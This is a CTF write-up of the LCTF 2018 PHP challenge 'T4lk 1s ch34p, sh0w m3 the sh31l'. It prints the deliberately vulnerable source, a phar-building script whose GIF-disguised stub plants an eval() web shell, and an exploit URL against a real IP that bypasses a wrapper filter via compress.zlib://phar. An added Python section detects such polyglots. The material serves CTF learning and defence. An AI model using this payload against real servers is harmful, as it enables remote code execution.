LCTF writeup: simple reproduction

1. T4lk 1s ch34p, sh0w m3 the sh31l

The challenge source is as follows:

<?php

$SECRET  = `../read_secret`;                                  
$SANDBOX = "../data/" . md5($SECRET. $_SERVER["REMOTE_ADDR"]);
$FILEBOX = "../file/" . md5("K0rz3n". $_SERVER["REMOTE_ADDR"]);   
mkdir($SANDBOX);
mkdir($FILEBOX);
echo "$FILEBOX";


if (!isset($_COOKIE["session-data"])) {
    $data = serialize(new User($SANDBOX));
    $hmac = hash_hmac("md5", $data, $SECRET);
    setcookie("session-data", sprintf("%s-----%s", $data, $hmac));      
}


class User {
    public $avatar;
    function __construct($path) {
        $this->avatar = $path;                                          
    }
}


class K0rz3n_secret_flag {
    protected $file_path;
    function __destruct(){
        if(preg_match('/(log|etc|session|proc|read_secret|history|class)/i', $this->file_path)){
            die("Sorry Sorry Sorry");
        }
        include_once($this->file_path);
    }
}

function check_session() {
    global $SECRET;
    $data = $_COOKIE["session-data"];
    list($data, $hmac) = explode("-----", $data, 2);
    if (!isset($data, $hmac) || !is_string($data) || !is_string($hmac)){
        die("Bye");
    }
    if ( !hash_equals(hash_hmac("md5", $data, $SECRET), $hmac) ){
        die("Bye Bye");
    }
    $data = unserialize($data);

    if ( !isset($data->avatar) ){
        die("Bye Bye Bye");
    }
    return $data->avatar; // return the upload path
}


function upload($path) {
    if(isset($_GET['url'])){
         if(preg_match('/^(http|https).*/i', $_GET['url'])){
            $data = file_get_contents($_GET["url"] . "/avatar.gif");                                                                                     
            if (substr($data, 0, 6) !== "GIF89a"){
                die("Fuck off");
            }
            //?m=upload&url=http://vps/avatar.gif
            file_put_contents($path . "/avatar.gif", $data);
            die("Upload OK");
        }else{
            die("Hacker");
        }           
    }else{
        die("Miss the URL~~");
    }
}


function show($path) {
    if ( !is_dir($path) || !file_exists($path . "/avatar.gif")) {

        $path = "/var/www";
    }
    header("Content-Type: image/gif");
    die(file_get_contents($path . "/avatar.gif"));                     
}



function check($path){
    if(isset($_GET['c'])){
        if(preg_match('/^(ftp|php|zlib|data|glob|phar|ssh2|rar|ogg|expect)(.|\s)*|(.|\s)*(file)(.|\s)*/i',$_GET['c'])){
            die("Hacker Hacker Hacker");
        }else{
            $file_path = $_GET['c'];
            list($width, $height, $type) = @getimagesize($file_path);
            die("Width is :" . $width." px<br>" .
                "Height is :" . $height." px<br>");
        }
    }else{
        list($width, $height, $type) = @getimagesize($path."/avatar.gif");
        die("Width is :" . $width." px<br>" .
            "Height is :" . $height." px<br>");
    }
}


function move($source_path,$dest_name){
    global $FILEBOX;
    $dest_path = $FILEBOX . "/" . $dest_name;
    if(preg_match('/(log|etc|session|proc|root|secret|www|history|file|..|ftp|php|phar|zlib|data|glob|ssh2|rar|ogg|expect|http|https)/i',$source_path)){
        die("Hacker Hacker Hacker");
    }else{
        if(copy($source_path,$dest_path)){
            die("Successful copy");
        }else{
            die("Copy failed");
        }
    }
}




$mode = $_GET["m"];

if ($mode == "upload"){
     upload(check_session());
}
else if ($mode == "show"){
    show(check_session());
}
else if ($mode == "check"){
    check(check_session());
}
else if($mode == "move"){
    move($_GET['source'],$_GET['dest']);
}
else{

    highlight_file(__FILE__);    
}

1. Upload a malicious file; when it is deserialized, the uploaded file gets included. Note that the generated avatar.gif not only overrides the upload path $file_path on deserialization, but can also carry PHP code written into it via setStub, which is then file-included.

?m=upload&url=http://vps/avatar.gif

<?php
class K0rz3n_secret_flag {
    protected $file_path='/var/www/data/67bf5ff3cfa1cdd00f700328698c2adb/avatar.gif';
    function __destruct(){
        if(preg_match('/(log|etc|session|proc|read_secret|history|class)/i', $this->file_path)){
            die("Sorry Sorry Sorry");
        }
        include_once($this->file_path);
    }
}

$a= new K0rz3n_secret_flag();
$p = new Phar('./1.phar', 0);
$p->startBuffering();
$p->setStub('GIF89a<?php echo 1;eval($_GET["a"]);?'.'><?php __HALT_COMPILER(); ?'.'>');
$p->setMetadata($a);
$p->addFromString('1.txt','text');
$p->stopBuffering();
rename('./1.phar', 'avatar.gif');

The generated malicious file

2. Deserialization is triggered during check. The regex is bypassed via compress.zlib://phar. Reference: https://blog.zsxsoft.com/post/38

http://212.64.7.171/LCTF.php?m=check&c=compress.zlib://phar:///var/www/data/dccb75e38fe3fc2c70fd169f263e6d37/avatar.gif&a=phpinfo();
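As an added, defender-side example (not part of the original writeup): a small Python check for the two weaknesses this challenge relies on, a GIF/phar polyglot that passes the `GIF89a` magic check, and a nested stream wrapper that slips past a regex anchored only on the outer scheme. The sandbox path, function names and sample bytes are constructed.

```python
"""Detection helpers for the phar-polyglot / nested-wrapper pattern above.
Added example; names, sandbox path and sample bytes are constructed."""
import os
import re

# PHP's phar loader only requires this marker to end the stub, so a file can
# start with GIF89a (satisfying substr($data, 0, 6) === "GIF89a") and still
# be a valid phar archive whose metadata is unserialized on access.
PHAR_STUB_MARKER = b"__HALT_COMPILER();"

# Matches one stream-wrapper prefix such as "compress.zlib://" or "phar://".
WRAPPER_RE = re.compile(r"^([a-z][a-z0-9.+-]*)://", re.I)


def is_phar_polyglot(data: bytes) -> bool:
    """True if the bytes carry image magic but also contain a phar stub."""
    if len(data) < 6:
        return False
    has_image_magic = data[:6] in (b"GIF89a", b"GIF87a") or data[:4] == b"\x89PNG"
    return has_image_magic and PHAR_STUB_MARKER in data


def unwrap_schemes(path: str) -> list:
    """Peel every wrapper off a path, outermost first.

    'compress.zlib://phar:///var/www/x.gif' -> ['compress.zlib', 'phar'].
    The challenge regex only looked at the outer scheme, so the inner
    phar:// was never seen.
    """
    schemes = []
    rest = path
    while True:
        m = WRAPPER_RE.match(rest)
        if not m:
            return schemes
        schemes.append(m.group(1).lower())
        rest = rest[m.end():]


def path_allowed(path: str, sandbox: str = "/var/www/data/") -> bool:
    """Allowlist instead of blocklist: no wrapper at any depth, and the
    normalised path must stay inside the per-user sandbox directory."""
    if unwrap_schemes(path):
        return False
    norm = os.path.normpath(path)
    return norm.startswith(os.path.normpath(sandbox) + os.sep)


# Constructed samples: a polyglot of the shape setStub() produces, and a
# plain GIF header for comparison.
SAMPLE_POLYGLOT = b"GIF89a<?php echo 1; ?><?php __HALT_COMPILER(); ?>" + b"\x00" * 16
SAMPLE_GIF = b"GIF89a\x01\x00\x01\x00\x80\x00\x00"
```

A cheap complement to these checks is to re-encode every uploaded image with an image library before storing it, which strips the phar stub and metadata entirely.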

2. bestphp's revenge

Deserialization through the Soap class is used to perform SSRF. For details see: https://xz.aliyun.com/t/3339#toc-3 https://xz.aliyun.com/t/3341#toc-22 https://www.anquanke.com/post/id/164569

References:

https://xz.aliyun.com/t/3341#toc-8

https://xz.aliyun.com/t/3339#toc-4

https://xz.aliyun.com/t/3340#toc-3

http://www.k0rz3n.com/2018/11/19/LCTF%202018%20T4lk%201s%20ch34p,sh0w%20m3%20the%20sh31l%20%E8%AF%A6%E7%BB%86%E5%88%86%E6%9E%90/

Original article: https://www.cnblogs.com/afanti/p/9987094.html